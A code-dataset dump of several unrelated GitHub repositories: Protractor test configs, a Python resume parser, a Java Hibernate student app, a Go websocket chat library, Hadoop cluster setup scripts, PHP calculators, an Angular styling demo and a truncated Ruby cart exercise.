branch_name
stringclasses
149 values
text
stringlengths
23
89.3M
directory_id
stringlengths
40
40
languages
listlengths
1
19
num_files
int64
1
11.8k
repo_language
stringclasses
38 values
repo_name
stringlengths
6
114
revision_id
stringlengths
40
40
snapshot_id
stringlengths
40
40
refs/heads/master
<file_sep>var Jasmine2HtmlReporter = require('protractor-jasmine2-html-reporter'); var log4js = require('log4js'); var params = process.argv; var args = process.argv.slice(3); exports.config = { allScriptsTimeout: 100000, framework: 'jasmine2', directConnect: true, onPrepare: function () { browser.manage().timeouts().implicitlyWait(11000); var width = 768; var height = 1366; browser.driver.manage().window().setSize(768, 1366); browser.ignoreSynchronization = false; jasmine.getEnv().addReporter( new Jasmine2HtmlReporter({ savePath: __dirname+'/qualityreports/testresults/e2e', takeScreenshots: false, filePrefix: 'automationReport', consolidate: true, cleanDestination: false, consolidateAll: true }) ); }, suites:{ example:['./e2e/specs/**/*Spec.js',] }, capabilities: { 'browserName': 'chrome' }, resultJsonOutputFile:'./results.json', // Options to be passed to Jasmine-node. jasmineNodeOpts: { showColors: true, defaultTimeoutInterval: 100000 } };<file_sep># protractor-with-typeScript protractor-with-typeScript <file_sep>module.exports = { tests: 'e2e/**/*.spec.js', dist: "dist/", utils: "utils/*.js", distFiles: "dist/**/*.js" };<file_sep>import { ProtractorBrowser, Config } from 'protractor'; export let config: Config = { seleniumAddress: 'http://localhost:4444/wd/hub', capabilities: { 'browserName': 'chrome' }, framework: 'jasmine', specs: ['./specs/**/*.js'], jasmineNodeOpts: { defaultTimeoutInterval: 90000 }, onPrepare: () => { let globals = require('protractor'); let browser = globals.browser; browser.manage().window().maximize(); browser.manage().timeouts().implicitlyWait(5000); } }<file_sep>import { Config } from 'protractor'; export declare let config: Config; <file_sep>module.exports = function TakeScreenshot() { this.After(function (spec, callback) { if (spec.isFailed()) { browser.takeScreenshot().then(function (png) { var decodedImage = new Buffer(png.replace(/^data:image\/(png|gif|jpeg);base64,/,''), 'base64'); spec.attach(decodedImage, 'image/png'); callback(); }); } else { callback(); } }); }<file_sep>var gulp = require("gulp"); var gulpProtractor = require('gulp-protractor'); var protractor = require("gulp-protractor").protractor; var reporter = require("gulp-protractor-cucumber-html-report"); var params = process.argv; var args = process.argv.slice(3); var paths = require('../paths'); gulp.task("e2e", ["build"], function () { return gulp.src(paths.test) .pipe(protractor({ configFile: "protractor.conf.js", args: args })) .on("error", function (e) { throw e; }); }); gulp.task('webdriver-update', gulpProtractor.webdriver_update); gulp.task('webdriver-standalone', ['webdriver-update'], gulpProtractor.webdriver_standalone); gulp.task("e2e-report", function () { gulp.src(paths.testResultJson) .pipe(reporter({ dest: paths.e2eReports })); });
ec9fc669587df27ce2820fdad57780bc21daf42d
[ "JavaScript", "TypeScript", "Markdown" ]
7
JavaScript
tyaga001/protractor-with-typeScript
c4a6eaa983da91b5af50faa08abce208ae143a65
2f772f5fb2c1b2034380851eb365536dab65f46b
refs/heads/master
<file_sep>import re,nltk,docx2txt,csv,os,datetime # import textract - textract library works only for Linux (ubuntu) from nltk.corpus import stopwords from nltk.tokenize import word_tokenize ############################################################################ def extract_phone_numbers(string): #r = re.compile(r'(\d{3}[-\.\s]??\d{3}[-\.\s]??\d{4}|\(\d{3}\)\s*\d{3}[-\.\s]??\d{4}|\d{3}[-\.\s]??\d{4})') mobile = "" match_mobile = re.search(r'((?:\(?\+91\)?)?\d{10})',string) #phone_numbers = r.findall(string) #return [re.sub(r'\D', '', number) for number in phone_numbers] if(match_mobile != None): mobile = match_mobile.group(0) return mobile ################################################################################### def extract_email_addresses(string): r = re.compile(r'[\w\.-]+@[\w\.-]+') return r.findall(string) ################################################################################# def extract_names(document): nouns = [] #empty to array to hold all nouns stop = stopwords.words('english') stop.append("Resume") stop.append("RESUME") document = ' '.join([i for i in document.split() if i not in stop]) sentences = nltk.sent_tokenize(document) for sentence in sentences: for word,pos in nltk.pos_tag(nltk.word_tokenize(str(sentence))): if (pos == 'NNP' and len(word)>2): nouns.append(word) nouns=' '.join(map(str,nouns)) nouns=nouns.split() return nouns ############################################################################## ##encode("utf-8", "replace") def modification_date(filename): t = os.path.getmtime(filename) return datetime.datetime.fromtimestamp(t) ########################################################### def generate_ngrams(filename, n): words = filename.split() output = [] for i in range(len(words)-n+1): output.append(words[i:i+n]) f=[] for i in output: if 'years' in i: f.append(output[output.index(i)]) if len(f)==1: n=f[0][0] n=n + " " + "years" break if len(f)<1: n='Not specified' return n ############################################################ """ a=[] for q in skill_set: fullText.find(q) a.append(q) """ ##################################################### def get_convert_to_text(filename): """ Take the path of a docx file as argument, return the text in unicode. """ if filename.endswith(".docx"): fullText = docx2txt.process(filename) elif filename.endswith(".pdf"): fullText=str(textract.process(filename)) fullText = fullText.replace("\\n"," ") else: print ("File format is currently not supported") exit(0) details=[];ab=[];a=[] name_coll = extract_names(fullText) #print(name_coll) fullText=fullText.replace('b"',"") stop = stopwords.words('english') stop.append("Resume") stop.append("RESUME") abc=fullText.split() b=extract_phone_numbers(fullText) c=set(extract_email_addresses(fullText)) e=modification_date(filename) mi=filename.lower() #print(mi) h=mi.replace("_"," ") h=h.replace("-"," ") h=h.replace(","," ") h=h.replace(".docx"," ") h=h.replace(".pdf"," ") h=h.split() if 'years' in h and 'months' in h: d=h[h.index('years')-1] + " " + h[h.index('years')]+ " " +h[h.index('months')-1] + " " +h[h.index('months')] elif 'years' in h: d=h[h.index('years')-1] + " " + h[h.index('years')] elif 'months' in h: d=h[h.index('months')-1] + " " + h[h.index('months')] elif re.search('no experience',str(h),re.M|re.I) : d='No Experience' else: d=generate_ngrams(fullText, 2) for i in name_coll : if re.search(i, str(c),re.M|re.I) or re.search(i,filename,re.M|re.I) : ab.append(i) if len(ab)==1: break with open("/home/palak/Documents/Filter Profile/Resumes/all_linked_skills.txt","r") as skill: skill_set = skill.read().split("\n") f=[] for s in skill_set: if s in fullText: if len(s)>2: f.append(s) #a='palak' a=abc[abc.index(ab[0])] + " " + abc[abc.index(ab[0])+1] c=" ".join(str(x) for x in c) details={'Name':a,'Mob no':b,'Email':c,'Resume':filename,'Number of exp' : d,'Last Modified' : e,'Skills Set' : f} return (details) #################################################################### ###MAIN Program ################################# if __name__ == '__main__': output=[] #files_list=[] for root, dirs, files in os.walk("."): for file in files: if file.endswith(".docx"): output.append(get_convert_to_text(file)) if file.endswith(".pdf"): output.append(get_convert_to_text(file)) with open('names.csv', 'w') as csvfile: fieldnames = ['Name', 'Mob no','Email','Resume','Number of exp', 'Last Modified','Skills Set'] writer = csv.DictWriter(csvfile, fieldnames=fieldnames) writer.writeheader() for i in range(len(output)): writer.writerow(output[i]) print() print("########Resume Filter############") print("Please check the CSV file , Data loaded into it ")
491fefd4e3dcbbbec2a97719d6839060c90098f8
[ "Python" ]
1
Python
rishiraj08/Resume_Parsing
14c755d676cc18ba7a58384b2d0f35bcb5902670
68dbf009ad51bbbcb6cc89c1afd36b55440281f0
refs/heads/master
<file_sep>/* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ package sys.bean; import java.util.List; import javax.inject.Named; import javax.faces.view.ViewScoped; import sys.dao.EstudiantesDAO; import sys.dao.EstudiantesDAOimp; import sys.model.Estudiantes; @Named(value = "estudiantesBean") @ViewScoped public class EstudiantesBean { private List<Estudiantes> listar; private Estudiantes estudiante; public EstudiantesBean() { } public Estudiantes getEstudiante() { return estudiante; } public void setEstudiante(Estudiantes estudiante) { this.estudiante = estudiante; } public List<Estudiantes> getListar() { EstudiantesDAO edao = new EstudiantesDAOimp(); listar = edao.mostrar(); return listar; } public void nuevoestudiante(){ EstudiantesDAO edao = new EstudiantesDAOimp(); edao.nuevoestudiante(estudiante); estudiante = new Estudiantes(); } }<file_sep># PruebaTecnica Requerimientos Java 1.8 JDK 8.X Oracle Express 11g IDE Se uso la version de netbeans_2019-06 <file_sep>package sys.model; // Generated 9/08/2019 09:14:19 AM by Hibernate Tools 4.3.1 /** * Estudiantes generated by hbm2java */ public class Estudiantes implements java.io.Serializable { private short idEstudiante; private String nombre; private String apellido; public Estudiantes() { } public Estudiantes(short idEstudiante) { this.idEstudiante = idEstudiante; } public Estudiantes(short idEstudiante, String nombre, String apellido) { this.idEstudiante = idEstudiante; this.nombre = nombre; this.apellido = apellido; } public short getIdEstudiante() { return this.idEstudiante; } public void setIdEstudiante(short idEstudiante) { this.idEstudiante = idEstudiante; } public String getNombre() { return this.nombre; } public void setNombre(String nombre) { this.nombre = nombre; } public String getApellido() { return this.apellido; } public void setApellido(String apellido) { this.apellido = apellido; } } <file_sep>/* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ package sys.dao; import java.util.List; import org.hibernate.HibernateException; import org.hibernate.Session; import org.hibernate.Transaction; import sys.model.Estudiantes; import sys.util.HibernateUtil; /** * * @author santi */ public class EstudiantesDAOimp implements EstudiantesDAO{ @Override public List<Estudiantes> mostrar() { List<Estudiantes> listar = null; Session session = HibernateUtil.getSessionFactory().openSession(); Transaction transaction = session.beginTransaction(); String hql="FROM Estudiantes"; try{ listar = session.createQuery(hql).list(); transaction.commit(); session.close(); } catch (HibernateException e){ System.out.println(e.getMessage()); transaction.rollback(); } return listar; } @Override public void nuevoestudiante(Estudiantes estudiante) { Session session = null; try{ session = HibernateUtil.getSessionFactory().openSession(); session.beginTransaction(); session.save(estudiante); session.getTransaction().commit(); } catch(HibernateException e){ System.out.println(e.getMessage()); session.getTransaction().rollback(); } finally{ if(session!=null){ session.close(); } } } }
4e1f359412c71729c08122287d6aacdbd7c6bf12
[ "Markdown", "Java" ]
4
Java
joelvargas9528/PruebaTecnica
efab16212c34a0bb2694202034d99357786a2205
de06254d2c62e6229ea0f44c2c6074e39023de3c
refs/heads/master
<repo_name>Codepanion/codepanion-ideone-api<file_sep>/README.md # codepanion-ideone-api ##Points to Consider : 1. Ideone API responds with an array of keys and value. Utilising that in python becomes difficult . Hence, we require a method to convert it to a python dictionary . That has been implemented . 2. Your username and password are the ones you create when you register yourself as a developer . Normal user ones won't cut it . 3. Script provided in Node.js, Python and PHP . Although, Codepanion utilises it in Python. 4. Conversion to a native dictionary is not required in PHP and Node.js. 5. Node.js implementation returns values in JSON format . ##Dependencies : 1. Python : Any Web framework for implementation + [SOAPpy](https://github.com/kiorky/SOAPpy) . 2. Javascript : Node.js + [jsonrpc protocol](http://www.jsonrpc.org/) . <file_sep>/ideone-api-python.py from SOAPpy import WSDL from time import sleep def transform_to_dict(result): result_dict = {} property_list = result.item for item in property_list: result_dict[item.key] = item.value return result_dict def print_dict(sample_dict): return str(sample_dict.values()) def calling(): username = 'rgbimbochamp' password = '<PASSWORD>' language = 1 code = """#include<stdio.h> int main() { int i ; scanf("%d",&i); i = i * 2 ; printf("%d",i); return 0; }""" testcases = '34' run = True private = False client = WSDL.Proxy('http://ideone.com/api/1/service.wsdl') result_nondict = client.createSubmission( username, password, code, language, testcases, run, private ) result = transform_to_dict(result_nondict) if(result['error'] == 'OK'): status_nondict = client.getSubmissionStatus(username, password, result['link']) status = transform_to_dict(status_nondict) if(status["error"] == 'OK'): while(status['status'] != 0): sleep(3) status_nondict = client.getSubmissionStatus(username,password,result['link']) status = transform_to_dict(status_nondict) details_nondict = client.getSubmissionDetails(username,password,result['link'],True,True,True,True,True) details = transform_to_dict(details_nondict) if(details["error"] == 'OK'): return print_dict(details) else: return print_dict(details) else: return print_dict(status) else: return print_dict(result)
b48591a16f2d6671d37769be933f4fd6a88daa51
[ "Markdown", "Python" ]
2
Markdown
Codepanion/codepanion-ideone-api
420cef78fd103f65f12962e300c743321fc6b857
86f94ca947de5dd486c631610ee8ced939a2403d
refs/heads/master
<file_sep>echo "stoping hadoop-slave1 container..." sudo docker stop hadoop-slave1 echo "stoping hadoop-slave2 container..." sudo docker stop hadoop-slave2 echo "stoping hadoop-master container..." sudo docker stop hadoop-master <file_sep>#!/bin/bash # the default node number is 3 N=${1:-3} sudo docker network create --subnet=172.18.0.0/16 hadoop &> /dev/null # start hadoop master container sudo docker rm -f hadoop-master &> /dev/null echo "start hadoop-master container..." sudo docker run -itd \ --net=hadoop \ --ip 172.18.0.2 \ -p 50070:50070 \ -p 8088:8088 \ --name hadoop-master \ --hostname hadoop-master \ kiwenlau/hadoop:1.0 # start hadoop slave container i=1 while [ $i -lt $N ] do j=$(( $i + 2 )) sudo docker rm -f hadoop-slave$i &> /dev/null echo "start hadoop-slave$i container..." sudo docker run -itd \ --net=hadoop \ --ip 172.18.0.$j \ --name hadoop-slave$i \ --hostname hadoop-slave$i \ kiwenlau/hadoop:1.0 i=$(( $i + 1 )) done # start hadoop in container echo "starting hadoop ...." sudo docker exec -it "hadoop-master" /bin/sh /root/start-hadoop.sh <file_sep># HaoopQuickStart 快速搭建hadoop,提供Centos(7.6版本最优)及docker两种方式 # 声明 - 本项目中大部分脚本是在KiwenLau(<EMAIL>)大神的《基于Docker搭建Hadoop集群之升级版》上的项目修改及优化而成 - 详见:https://kiwenlau.com/2016/06/12/160612-hadoop-cluster-docker-update/ # 改动概述 - 修改了源项目中的Dockerfile: 1. 更换了sources.list(使用了国内源),使镜像建立速度更快; - 修改了源项目中的容器run脚本: 1. 添加了:run前先建立hadoop的network(centos执行脚本会时提示不存在名为hadoop的network...) 2. 更改了:使用了静态ip 3. 添加了:容器建立成功后马上执行hadoop启动脚本 - 修改了start-hadoop.sh: 1. 添加了:启动historyserver,更加方便查看已完成的Appliction历史情况 - 修改了yarn.xml: 1. 添加了yarn.log-aggregation-enable属性,更方便hadoop保存已完成任务的日志到hdfs - 添加了一些更方便的脚本,如重启、关停hadoop脚本 - 修改了mapred-site.xml: 1. 添加了任务完成回调属性等 # 其他 - 详见hadoop_for_centos7.6及hadoop_for_docker下README.md - 或联系 <EMAIL> <file_sep>echo "starting hadoop-master container..." sudo docker start hadoop-master echo "starting hadoop-slave1 container..." sudo docker start hadoop-slave1 echo "starting hadoop-slave2 container..." sudo docker start hadoop-slave2 echo "starting hadoop ...." sudo docker exec -it "hadoop-master" /bin/sh /root/start-hadoop.sh<file_sep>#!/bin/bash set -e current_path=`pwd` echo "shutdown the fire wall" #¹Ø±Õ·À»ðǽ systemctl stop firewalld systemctl disable firewalld echo "building java ..." tar -xzvf $current_path/jdk-8u201-linux-x64.tar.gz -C ~/ mv ~/jdk1.8.0_201 /usr/local/jdk1.8.0_201 echo "JAVA_HOME=/usr/local/jdk1.8.0_201" >> /etc/profile echo "JRE_HOME=\$JAVA_HOME/jre" >> /etc/profile echo "CLASS_PATH=.:\$JAVA_HOME/lib/dt.jar:\$JAVA_HOME/lib/tools.jar:\$JRE_HOME/lib" >> /etc/profile echo "PATH=\$PATH:\$JAVA_HOME/bin:\$JRE_HOME/bin" >> /etc/profile source /etc/profile mkdir /usr/lib/jvm ln -s $JAVA_HOME /usr/lib/jvm/java-7-openjdk-amd64 echo "ready to build hadoop ..." yum install wget -y wget https://github.com/kiwenlau/compile-hadoop/releases/download/2.7.2/hadoop-2.7.2.tar.gz tar -xzvf hadoop-2.7.2.tar.gz && \ mv hadoop-2.7.2 /usr/local/hadoop && \ rm hadoop-2.7.2.tar.gz echo "building hadoop path ..." echo "HADOOP_HOME=/usr/local/hadoop" >> /etc/profile echo "PATH=\$PATH:/usr/local/hadoop/bin:/usr/local/hadoop/sbin" >> /etc/profile source /etc/profile mkdir -p ~/hdfs/namenode && \ mkdir -p ~/hdfs/datanode && \ mkdir $HADOOP_HOME/logs config_path="$current_path/../config" \cp $config_path/ssh_config ~/.ssh/config && \ \cp $config_path/hadoop-env.2.0.sh /usr/local/hadoop/etc/hadoop/hadoop-env.sh && \ \cp $config_path/hdfs-site.xml $HADOOP_HOME/etc/hadoop/hdfs-site.xml && \ \cp $config_path/core-site.xml $HADOOP_HOME/etc/hadoop/core-site.xml && \ \cp $config_path/mapred-site.xml $HADOOP_HOME/etc/hadoop/mapred-site.xml && \ \cp $config_path/yarn-site.xml $HADOOP_HOME/etc/hadoop/yarn-site.xml && \ \cp $config_path/slaves $HADOOP_HOME/etc/hadoop/slaves && \ \cp $config_path/start-hadoop.sh ~/start-hadoop.sh && \ \cp $config_path/stop-hadoop.sh ~/stop-hadoop.sh && \ \cp $config_path/restart-hadoop.sh ~/restart-hadoop.sh && \ \cp $config_path/run-wordcount.sh ~/run-wordcount.sh chmod +x ~/start-hadoop.sh && \ chmod +x ~/stop-hadoop.sh && \ chmod +x ~/restart-hadoop.sh && \ chmod +x ~/run-wordcount.sh && \ chmod +x $HADOOP_HOME/sbin/start-dfs.sh && \ chmod +x $HADOOP_HOME/sbin/start-yarn.sh # format namenode $HADOOP_HOME/bin/hdfs namenode -format echo "hadoop build success!"<file_sep># HaoopQuickStart for hadoop - 运行方式: 1. 配置好各个节点之间的ssh免密登录,略 2. 配置好各个节点的hosts文件,至少需要配置的节点:hadoop-master + hadoop-slave1 + hadoop-slave2, 略 3. 在各个节点的服务器上运行:**source** build-hadoop.sh # 声明 - 本项目中大部分脚本是在KiwenLau(<EMAIL>)大神的《基于Docker搭建Hadoop集群之升级版》上的项目修改及优化而成 - 详见:https://kiwenlau.com/2016/06/12/160612-hadoop-cluster-docker-update/ # 改动概述 - 将源项目的Dockerfile修改为适合centos7的build-hadoop.sh - 添加了update-config.sh,更加方便快速更新配置文件到各个节点使用方法: **source** update-config.sh hadoop-master hadoop-slave1 hadoop-slave2 ...<file_sep># HaoopQuickStart for hadoop 运行方式:sh build-hadoop-image.sh # 声明 - 本项目中大部分脚本是在KiwenLau(<EMAIL>)大神的《基于Docker搭建Hadoop集群之升级版》上的项目修改及优化而成 - 详见:https://kiwenlau.com/2016/06/12/160612-hadoop-cluster-docker-update/ # 改动概述 - 修改了源项目中的Dockerfile: 1. 更换了sources.list(使用了国内源),使镜像建立速度更快; - 修改了源项目中的容器run脚本: 1. 添加了:run前先建立hadoop的network(centos执行脚本会时提示不存在名为hadoop的network...) 2. 更改了:使用了静态ip 3. 添加了:容器建立成功后马上执行hadoop启动脚本 - 修改了start-hadoop.sh: 1. 添加了:启动historyserver,更加方便查看已完成的Appliction历史情况<file_sep>#!/bin/bash set -e echo -e "\n" sh $HADOOP_HOME/sbin/stop-yarn.sh echo -e "\n" sh $HADOOP_HOME/sbin/stop-dfs.sh echo -e "\n" sh $HADOOP_HOME/sbin/start-dfs.sh echo -e "\n" sh $HADOOP_HOME/sbin/start-yarn.sh echo -e "\n"<file_sep>#!/bin/bash set -e echo -e "\n" sh $HADOOP_HOME/sbin/stop-yarn.sh echo -e "\n" sh $HADOOP_HOME/sbin/stop-dfs.sh echo -e "\n" sh $HADOOP_HOME/sbin/mr-jobhistory-daemon.sh stop historyserver echo -e "\n"
e95567dd086da0e568e150201b8121787ec2f91d
[ "Markdown", "Shell" ]
9
Shell
cyx2706/HaoopQuickStart
f0b983d46a64987aedaa469cff741483ca982692
e095626a40f0168cbb6b1347c11a541c126e664b
refs/heads/master
<repo_name>Alcvetkov/Homework-PHPWeb<file_sep>/Task2.php <?php function get_value($array, $key, $default = null) { return isset($array[$key]) ? $array[$key] : $default; } $user = get_value($_POST, 'user'); $pass= get_value($_POST, 'pass'); $rePass= get_value($_POST, 'rPass'); $result = ""; $isCorrect = false; echo $user . ' ' . $pass; if ($pass == $rePass) { $isCorrect = true; $result = md5($pass); } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Insert title here</title> <style> label { display: block; } </style> </head> <body> <div> <form action="" method="post"> <div> <label for="user">User name:</label> <input type="text" name="user"/> </div> <div> <label for="pass">Password:</label> <input type="password" name="pass"/> </div> <div> <label for="rPass">Repeat password:</label> <input type="password" name="rPass"/> </div> <div> <button type="submit" >Register</button> </div> </form> </div> <?php if (isset($pass) && isset($rePass)) : ?> <?php if ($isCorrect) : ?> <p>The user name is <strong><?= $user ?></strong> and the password is <strong><?= $result ?></strong>.</p> <?php else : ?> <p>The password and the repeated passwprd are not the same.</p> <?php endif; ?> <?php endif; ?> </body> </html><file_sep>/Task3.php <?php function get_value($array, $key, $default = null) { return isset($array[$key]) ? $array[$key] : $default; } $number = get_value($_POST, 'number'); $convertGradus = get_value($_POST, 'gradus'); $result = 0; if ($convertGradus == "CtoF") { $result = (9 / 5) * $number + 32; } else if ($convertGradus == "FtoC") { $result = (5 / 9) * ($number - 32); } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Gradus Calculator</title> </head> <body> <div> <form action="" method="post"> <div> <input type="text" name="number"/> <select name="gradus" id="gradus"> <option value="CtoF">Celsius to Fahrenheit</option> <option value="FtoC">Fahrenheit to Celsius</option> </select> </div> <div> <button type="submit" >Calculate</button> </div> </form> </div> <?php if (isset($number)) : ?> <p>The result is <?= $result ?>.</p> <?php endif; ?> </body> </html><file_sep>/Task1.php <?php function get_value($array, $key, $default = null) { return isset($array[$key]) ? $array[$key] : $default; } $firstNumber = get_value($_POST, 'firstNumber'); $secondNumber = get_value($_POST, 'secondNumber'); $calculateSymbol= get_value($_POST, 'calc'); $result = 0; if ($calculateSymbol == "+") { $result = $firstNumber + $secondNumber; } else if ($calculateSymbol == "-") { $result = $firstNumber - $secondNumber; } else if ($calculateSymbol == "*") { $result = $firstNumber * $secondNumber; }else if ($calculateSymbol == "/") { if ($secondNumber != 0) { $result = $firstNumber / $secondNumber; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Calculator</title> </head> <body> <div> <form action="" method="post"> <div> <input type="text" name="firstNumber"/> <input type="text" name="secondNumber"/> <select name="calc" id="calculate"> <option value="+">+</option> <option value="-">-</option> <option value="*">*</option> <option value="/">/</option> </select> </div> <div> <button type="submit" >Calculate</button> </div> </form> </div> <?php if (isset($firstNumber) && isset($secondNumber)) : ?> <?php if ($secondNumber == 0) : ?> <p>Can't divide by 0.</p> <?php else : ?> <p>The result of <?= $firstNumber ." ". $calculateSymbol ." ". $secondNumber ." = ". $result ?></p> <?php endif; ?> <?php endif; ?> </body> </html>
de153b61f227f7efbabe316f05c9f53a9d0e13d7
[ "PHP" ]
3
PHP
Alcvetkov/Homework-PHPWeb
7b62bc7994f1ec8cb23d43569dbca6ccfcbb2efb
8de7deab4c461b5fae8ec370d5764e1096cf661d
refs/heads/master
<repo_name>NameLessCorporation/live-chat-lib<file_sep>/models/rooms.go package models import "github.com/NameLessCorporation/live-chat-lib/hub" // Rooms ... type Rooms struct { Rooms []*Room } // NewRooms ... func NewRooms() *Rooms { return &Rooms{ Rooms: nil, } } // Create ... func (rooms *Rooms) Create(room *Room) { h := hub.NewHub() go h.Run() room.Hub = h rooms.Rooms = append(rooms.Rooms, room) } // Delete ... func (rooms *Rooms) Delete(room *Room) { for i, r := range rooms.Rooms { if r.Token == room.Token { for _, c := range room.Clients { c.Connection.Close() } copy(rooms.Rooms[i:], rooms.Rooms[i+1:]) rooms.Rooms[len(rooms.Rooms)-1] = nil rooms.Rooms = rooms.Rooms[:len(rooms.Rooms)-1] } } } <file_sep>/models/room.go package models import ( "bytes" "fmt" "github.com/NameLessCorporation/live-chat-lib/hub" "github.com/gorilla/websocket" ) const ( maxMessageSize = 1024 ) // Room ... type Room struct { Name string `name:"json"` Token string `name:"json"` Clients []*hub.Client Hub *hub.Hub } // Writer ... func (room *Room) Writer(client *hub.Client) error { defer func() { client.Connection.Close() }() for { data, ok := <-client.Send if !ok { client.Connection.WriteMessage(websocket.CloseMessage, []byte{}) return nil } client.Connection.WriteMessage(1, data) } } // Reader ... func (room *Room) Reader(client *hub.Client) error { defer func() { room.Hub.Unregister <- client client.Connection.Close() }() client.Connection.SetReadLimit(maxMessageSize) for _, c := range room.Clients { if client == c { for { _, mess, err := client.Connection.ReadMessage() if err != nil { return err } data := []byte(fmt.Sprintf("%s: %s\n", client.ClientInfo.Name, string(mess))) for _, b := range data { room.Hub.Buffer = append(room.Hub.Buffer, b) } data = bytes.TrimSpace(bytes.Replace(data, []byte("\n"), []byte(" "), -1)) room.Hub.Broadcast <- data } } } return nil } <file_sep>/go.mod module github.com/NameLessCorporation/live-chat-lib go 1.15 require ( github.com/gorilla/websocket v1.4.2 github.com/sqs/goreturns v0.0.0-20181028201513-538ac6014518 // indirect ) <file_sep>/hub/client.go package hub import ( "github.com/gorilla/websocket" ) // Client ... type Client struct { Connection *websocket.Conn Send chan []byte ClientInfo *ClientInfo } // ClientInfo ... type ClientInfo struct { Name string `json:"name"` Email string `json:"email"` Token string `json:"token"` } <file_sep>/test/main.go package main import ( "encoding/json" "io/ioutil" "log" "net/http" "github.com/NameLessCorporation/live-chat-lib/hub" "github.com/NameLessCorporation/live-chat-lib/models" websocket "github.com/NameLessCorporation/live-chat-lib/websocket" ) func main() { handler() http.ListenAndServe(":8080", nil) } func handler() { rooms := models.NewRooms() // var ClientsQueue []*hub.ClientInfo var clientInfo hub.ClientInfo http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { http.ServeFile(w, r, "index.html") }) http.HandleFunc("/chat", func(w http.ResponseWriter, r *http.Request) { ws := websocket.NewWebSocket(w, r) ws.ConnectionWebSocket(&clientInfo, rooms) }) http.HandleFunc("/create", func(w http.ResponseWriter, r *http.Request) { type Request struct { Name string `json:"name"` Token string `json:"token"` } var req Request body, err := ioutil.ReadAll(r.Body) if err != nil { log.Println("Request error: ", err) } json.Unmarshal(body, &req) room := &models.Room{ Name: req.Name, Token: req.Token, Clients: nil, Hub: nil, } rooms.Create(room) }) http.HandleFunc("/delete", func(w http.ResponseWriter, r *http.Request) { type Request struct { Token string `json:"token"` } var req Request body, err := ioutil.ReadAll(r.Body) if err != nil { log.Println("Request error: ", err) } json.Unmarshal(body, &req) room := &models.Room{ Token: req.Token, } rooms.Delete(room) }) http.HandleFunc("/join", func(w http.ResponseWriter, r *http.Request) { body, err := ioutil.ReadAll(r.Body) if err != nil { log.Println("Request error: ", err) } json.Unmarshal(body, &clientInfo) }) } <file_sep>/test/go.mod module packages go 1.14 require github.com/NameLessCorporation/live-chat-lib v0.0.0-20200830204505-c00cd0c70ada // indirect <file_sep>/websocket/websocket.go package websoket import ( "log" "net/http" "github.com/NameLessCorporation/live-chat-lib/hub" "github.com/NameLessCorporation/live-chat-lib/models" "github.com/gorilla/websocket" ) // WebSocket ... type WebSocket struct { Upgrader *websocket.Upgrader Response http.ResponseWriter Request *http.Request } var upgrader = websocket.Upgrader{ ReadBufferSize: 1024, WriteBufferSize: 1024, } // NewWebSocket ... func NewWebSocket(w http.ResponseWriter, r *http.Request) *WebSocket { return &WebSocket{ Upgrader: &upgrader, Response: w, Request: r, } } // ConnectionWebSocket ... func (ws *WebSocket) ConnectionWebSocket(clientInfo *hub.ClientInfo, rooms *models.Rooms) error { for _, room := range rooms.Rooms { if room.Token == clientInfo.Token { conn, err := ws.Upgrader.Upgrade(ws.Response, ws.Request, nil) if err != nil { return err } client := &hub.Client{ Connection: conn, Send: make(chan []byte, 1024), ClientInfo: &hub.ClientInfo{ Name: clientInfo.Name, Email: clientInfo.Email, Token: clientInfo.Token, }, } room.Hub.Register <- client room.Clients = append(room.Clients, client) client.Connection.WriteMessage(1, room.Hub.Buffer) for _, c := range room.Clients { log.Println(c.ClientInfo.Name) } go room.Writer(client) go room.Reader(client) } } return nil } <file_sep>/README.md # live-chat-lib
f7d6a1753e8704f39ec462d14f099a0b578cfae3
[ "Markdown", "Go Module", "Go" ]
8
Go
NameLessCorporation/live-chat-lib
d6aed125e872d2ade4c56b3be658bd34c1a72f18
ea35d962e2bfdd6408c0924a533bbcc70f33d1bd
refs/heads/master
<repo_name>amarbalu/angular-StylesComponent<file_sep>/src/app/app.component.ts import { Component } from '@angular/core'; @Component({ selector: 'my-app', templateUrl: './app.component.html', styleUrls: [ './app.component.css' ] }) export class AppComponent { name = 'Angular'; styleVar:object //ngStyle to create as a variable which can modify styles in ts ngOnInit():void{ this.styleVar={ backgroundColor:"green" } } } <file_sep>/src/app/hello.component.ts import { Component, Input } from '@angular/core'; @Component({ selector: 'hello', template: `<h1 class="child">1) Styles in decorator</h1> <p style="color:blue"> 2) Tag Styles</p>`, // 2) Tag styles styles: [`h1 { font-family: Lato;background-color:orange;} :host{ margin:10px; border:10px solid ; } :host-context(.backg){ display:block; background-color:red; } `] // 1) Component styles }) export class HelloComponent { @Input() name: string; }
9a741bb671ac15cf0badf201a4f4caa54cfca769
[ "TypeScript" ]
2
TypeScript
amarbalu/angular-StylesComponent
1bd94881e951aed5e71006a00771ad0bba046392
b6f8b70e2314e38be3c323ec26ba6045f1a2de9b
refs/heads/master
<file_sep> def find_item_by_name_in_collection(name, collection) i = 0 while i < collection.length do object_ele = collection[i] item_name = object_ele[:item] if name == item_name return object_ele end i+=1 end nil end def consolidate_cart(cart) new_array_result = [] i = 0 while i < cart.length do objects_in_cart = cart[i] item_name_in_cart = objects_in_cart[:item] new_obj = find_item_by_name_in_collection(item_name_in_cart, new_array_result) if new_obj == nil objects_in_cart[:count] = 1 new_array_result.push(objects_in_cart) else new_obj[:count] += 1 end i+=1 end return new_array_result end def apply_coupons(cart, coupons) puts coupons i = 0 while i < coupons.length do coupon_obj = coupons[i] item_name_in_coupon = coupon_obj[:item] cart_item_obj = find_item_by_name_in_collection(item_name_in_coupon, cart) couponed_item_name = "#{item_name_in_coupon} W/COUPON" cart_item_with_coupon_obj = find_item_by_name_in_collection(couponed_item_name, cart) if cart_item_obj && cart_item_obj[:count] >= coupon_obj[:num] if cart_item_with_coupon_obj cart_item_with_coupon_obj[:count] += coupon_obj[:num] cart_item_obj -= coupon_obj[:num] else cart_item_with_coupon_obj ={ :item => couponed_item_name, :price => coupon_obj[:cost] / coupon_obj[:num], :count => coupon_obj[:num], :clearance => cart_item_obj[:clearance] } cart << cart_item_with_coupon_obj cart_item_obj[:count] -= 